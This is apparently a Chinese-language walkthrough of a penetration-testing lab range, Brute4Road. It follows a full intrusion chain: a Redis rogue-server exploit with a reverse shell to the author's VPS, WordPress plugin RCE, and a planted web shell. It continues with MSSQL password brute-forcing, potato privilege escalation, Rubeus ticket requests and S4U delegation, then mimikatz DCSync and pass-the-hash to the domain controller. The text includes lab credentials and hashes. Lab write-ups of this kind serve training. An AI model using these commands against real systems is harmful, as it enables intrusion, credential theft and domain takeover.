春秋云境靶场记录-Brute4Road

云瘾犯了，一秒把春秋云境打开

入口

端口扫描

6379有redis的未授权，ftp还有匿名登录

ftp里面只有一个空的pub文件夹，没别的了，再看看redis --> redis命令

redis里面也啥也没有

exp直接拿下

python3 redis-rogue-server.py --rhost=47.92.86.223 --lhost=VPS-IP

注意这个exp如果不想改代码的话也要在vps上运行，不然会卡在Setting dbfilename这里，想知道为什么可以去查看代码

成功收到shell

直接上马上线到viper方便后续操作

ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.2.7  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe0a:aef6  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:0a:ae:f6  txqueuelen 1000  (Ethernet)
        RX packets 111385  bytes 149022513 (142.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 21876  bytes 5471977 (5.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

再传fscan扫内网

(icmp) Target 172.22.2.3      is alive
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.18     is alive
(icmp) Target 172.22.2.34     is alive
[*] Icmp alive hosts len is: 5
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.16:139 open
172.22.2.18:139 open
172.22.2.34:135 open
172.22.2.3:139 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.16:80 open
172.22.2.18:80 open
172.22.2.7:80 open
172.22.2.18:22 open
172.22.2.7:21 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.18:445 open
172.22.2.7:22 open
172.22.2.7:6379 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] WebTitle: http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] NetInfo:
[*]172.22.2.34
   [->]CLIENT01
   [->]172.22.2.34
[*] NetInfo:
[*]172.22.2.3
   [->]DC
   [->]172.22.2.3
[*] NetBios: 172.22.2.34     XIAORANG\CLIENT01              
[*] NetInfo:
[*]172.22.2.16
   [->]MSSQLSERVER
   [->]172.22.2.16
[*] 172.22.2.3  (Windows Server 2016 Datacenter 14393)
[*] 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.2.16        code:404 len:315    title:Not Found
[*] NetBios: 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.2.3      [+]DC DC.xiaorang.lab               Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.2.18     WORKGROUP\UBUNTU-WEB02         
[+] ftp://172.22.2.7:21:anonymous 
   [->]pub
[*] WebTitle: http://172.22.2.18        code:200 len:57738  title:又一个WordPress站点

一共五台机器，概括一下

172.22.2.3      域控
172.22.2.7      拿下
172.22.2.16     mssql
172.22.2.18     wordpress
172.22.2.34

可以看到有两个可以利用的服务，但是先把当前机器flag拿了

手动枚举一下，发现base64有suid权限，直接读

viper做个代理先

连接成功，wpscan扫一下

p4 wpscan --url http://172.22.2.18/ --api-token 你的api

一眼插件有问题

直接开找第一个rce的poc

https://github.com/biulove0x/CVE-2021-25003

p4 python3 WpCargo.py -t http://172.22.2.18/

rce成功

直接写个一句话到当前目录，然后蚁剑连接

看一眼wp-config.php，顺手在之前的机器上做个端口转发把这台机器上线到viper

拿到账号密码

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );

直接蚁剑看一下数据库

拿到flag2

同时上面的S0meth1ng_y0u_m1ght_1ntereSted里面还有一个密码表

一共有999个密码这里就不放了

回顾之前的端口扫描结果，猜测是mssql的密码表

直接fscan爆破一手

fscan -h 172.22.2.16 -m mssql -pwdf 1.txt

拿到密码

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.16     is alive
[*] Icmp alive hosts len is: 1
172.22.2.16:1433 open
[*] alive ports len is: 1
start vulscan
[+] mssql:172.22.2.16:1433:sa ElGNkOiC
已完成 1/1
[*] 扫描结束,耗时: 655.654931ms

MDUT直接连接，也做一手上线

上线之后无脑甜土豆，提权成功，直接上线system，拿到flag3

viper的msf里抓一手域内用户hash

MSSQLSERVER$   XIAORANG     a6c742dc3079e8090e03ffe3c50cf674
MSSQLSERVER$   XIAORANG     cea3e66a2715c71423e7d3f0ff6cd352

用Rubeus申请访问自身的服务票据

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:a6c742dc3079e8090e03ffe3c50cf674 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

拿到票据

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.2 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: a6c742dc3079e8090e03ffe3c50cf674
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jL/Z8Oy6ClEMXCoRwLjpHbQYIdU/WtGjPj9dj67z2y87e7mgTLkMT5Bzw107e8YgY/CSvUUwy1X8W+9Hmp9ejxgAW7kKsAVMnY8kx2peDgV+vL+HfpmAfDWljZPDve5ZR2+dENFkzO82dbzn1cE+38ubWX8lGAJdOfvYHqbhQs1cErKaLQs2c4XHEKRUTryROkvjM4m5BZt/FAwFbVEF0ALCdNQDOI3rzRAsfjDZhHLSBy9SGqIkPZsGwIzxtL3dVqmO7JevAvrh3eRNskCyNEuq6F4uAL1jJPVJjMugtc+9/IPCzwtLIGy42o2m9LnR7s5g5hhgQYLMqZrVzw6SE5qNrtrAeBdc5GN8B0iZHgX95QEB9rrVtT6YBhtKs6SLLkTw31B1p8NZFFUe0wH26YHjNf1tOTEcTylh+WfRCfGze/aIY7lvAJ73ZXrGYKW/3qBO9mgE97RnUK1fjtsXjQ2WK0qsOOmm6A4bxn3t25VlBdTgw7AeLICh5cJ889sFGRss7MZSrS6lMiPFRTa2SXS/l2Phk/6OU+W15ZLZ4G9XQUZ814rY28WYg7Txc2T003aH4Usxc2XTb13W4lCNvrwF1AxW6/8/IgdUBB3nYPQsT4Fjoi4BHvZtp45nD51OnqxD0FGCLxvumjNhmeb40nZJAUEJkP4aC3OQ/mWF0hmfyzD17kKF6a3QEzLh4zjUAbceyU91/zCuljBtD3vVHN3WrXmwXF3VTYVELUmMSunTQxMCSyXUb6LFBocLhKuez/53H4DkMN+8CjA7UcTHCYoZI5H+Vu7s8znZQIc75dH+h0fE2tzadH4a+44Ew+LOuTlUjqKlEcOz9wkJgsYaEo6rnBHMbcWSH04Vxbx6RqUwgYJ3eFi8lavUWoLFp6Y/PcWvfOPWYVYT8QUuBNzqmwpTfVHN8e2MN6zcBaV0gknTqEME3oY49wJX/A8RCFlgPSmchvbc8dzNk5Pqk0vJcLQ0XjLGH1Orhmgytlri5s2jpIawDM4U/IDVhEQoh13LDg9VVmDX3OU5CoTWUxL0QzXm4EMcL5Qmdi05gcsQrEI82YzM7cmAQsAvNvktja1hS/0o4CkXANoGWmcsic9viMmQR0QhbM7y2b9zgvmmJMItbS8HlWxTjYTMQeTkHfO+VGbN7bUzvv6ErbSnP65UWlqxgXxIKv9vnRatUgbEA2+sZR+xVbeDowuit54Rr2CGaOpaHQye6IOrmAJiKJD5Ds2vbrNBHNFtWFucEkx91uhBEcB8J4tcKO+8Z/zhUwOtCSPUDec/Vpy5OTgNYCkZ98yXCTc21xm++eSOoZK5DwNc9FgzI70sXuw+jNuLILeoSnCbsw2VDFBRta3/Q+n1tJlI8qk55HU1vNLp0atmhIVao59tmatNRhveJeKxb8UzNe8BHSE2RkvDuCkp7Pl9TatBWWo0Q7UEmZQ2Ry9tMVi1qFTI6u5IgyNQeAcCjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCq9lNtbiOuC2ROsd1npy9koQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDUyNjA4MDkwOFqmERgPMjAyMzA1MjYxODA5MDhapxEYDzIwMjMwNjAyMDgwOTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

  ServiceName              :  krbtgt/xiaorang.lab
  ServiceRealm             :  XIAORANG.LAB
  UserName                 :  MSSQLSERVER$
  UserRealm                :  XIAORANG.LAB
  StartTime                :  2023/5/26 16:09:08
  EndTime                  :  2023/5/27 2:09:08
  RenewTill                :  2023/6/2 16:09:08
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  qvZTbW4jrgtkTrHdZ6cvZA==
  ASREP (key)              :  A6C742DC3079E8090E03FFE3C50CF674

然后注入票据

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jL/Z8Oy6ClEMXCoRwLjpHbQYIdU/WtGjPj9dj67z2y87e7mgTLkMT5Bzw107e8YgY/CSvUUwy1X8W+9Hmp9ejxgAW7kKsAVMnY8kx2peDgV+vL+HfpmAfDWljZPDve5ZR2+dENFkzO82dbzn1cE+38ubWX8lGAJdOfvYHqbhQs1cErKaLQs2c4XHEKRUTryROkvjM4m5BZt/FAwFbVEF0ALCdNQDOI3rzRAsfjDZhHLSBy9SGqIkPZsGwIzxtL3dVqmO7JevAvrh3eRNskCyNEuq6F4uAL1jJPVJjMugtc+9/IPCzwtLIGy42o2m9LnR7s5g5hhgQYLMqZrVzw6SE5qNrtrAeBdc5GN8B0iZHgX95QEB9rrVtT6YBhtKs6SLLkTw31B1p8NZFFUe0wH26YHjNf1tOTEcTylh+WfRCfGze/aIY7lvAJ73ZXrGYKW/3qBO9mgE97RnUK1fjtsXjQ2WK0qsOOmm6A4bxn3t25VlBdTgw7AeLICh5cJ889sFGRss7MZSrS6lMiPFRTa2SXS/l2Phk/6OU+W15ZLZ4G9XQUZ814rY28WYg7Txc2T003aH4Usxc2XTb13W4lCNvrwF1AxW6/8/IgdUBB3nYPQsT4Fjoi4BHvZtp45nD51OnqxD0FGCLxvumjNhmeb40nZJAUEJkP4aC3OQ/mWF0hmfyzD17kKF6a3QEzLh4zjUAbceyU91/zCuljBtD3vVHN3WrXmwXF3VTYVELUmMSunTQxMCSyXUb6LFBocLhKuez/53H4DkMN+8CjA7UcTHCYoZI5H+Vu7s8znZQIc75dH+h0fE2tzadH4a+44Ew+LOuTlUjqKlEcOz9wkJgsYaEo6rnBHMbcWSH04Vxbx6RqUwgYJ3eFi8lavUWoLFp6Y/PcWvfOPWYVYT8QUuBNzqmwpTfVHN8e2MN6zcBaV0gknTqEME3oY49wJX/A8RCFlgPSmchvbc8dzNk5Pqk0vJcLQ0XjLGH1Orhmgytlri5s2jpIawDM4U/IDVhEQoh13LDg9VVmDX3OU5CoTWUxL0QzXm4EMcL5Qmdi05gcsQrEI82YzM7cmAQsAvNvktja1hS/0o4CkXANoGWmcsic9viMmQR0QhbM7y2b9zgvmmJMItbS8HlWxTjYTMQeTkHfO+VGbN7bUzvv6ErbSnP65UWlqxgXxIKv9vnRatUgbEA2+sZR+xVbeDowuit54Rr2CGaOpaHQye6IOrmAJiKJD5Ds2vbrNBHNFtWFucEkx91uhBEcB8J4tcKO+8Z/zhUwOtCSPUDec/Vpy5OTgNYCkZ98yXCTc21xm++eSOoZK5DwNc9FgzI70sXuw+jNuLILeoSnCbsw2VDFBRta3/Q+n1tJlI8qk55HU1vNLp0atmhIVao59tmatNRhveJeKxb8UzNe8BHSE2RkvDuCkp7Pl9TatBWWo0Q7UEmZQ2Ry9tMVi1qFTI6u5IgyNQeAcCjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCq9lNtbiOuC2ROsd1npy9koQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDUyNjA4MDkwOFqmERgPMjAyMzA1MjYxODA5MDhapxEYDzIwMjMwNjAyMDgwOTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

然后mimikatz再dump

lsadump::dcsync /domain:xiaorang.lab /user:Administrator

拿到hash，然后直接wmiexec拿到flag4

p4 python3 wmiexec.py -hashes :1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3

结束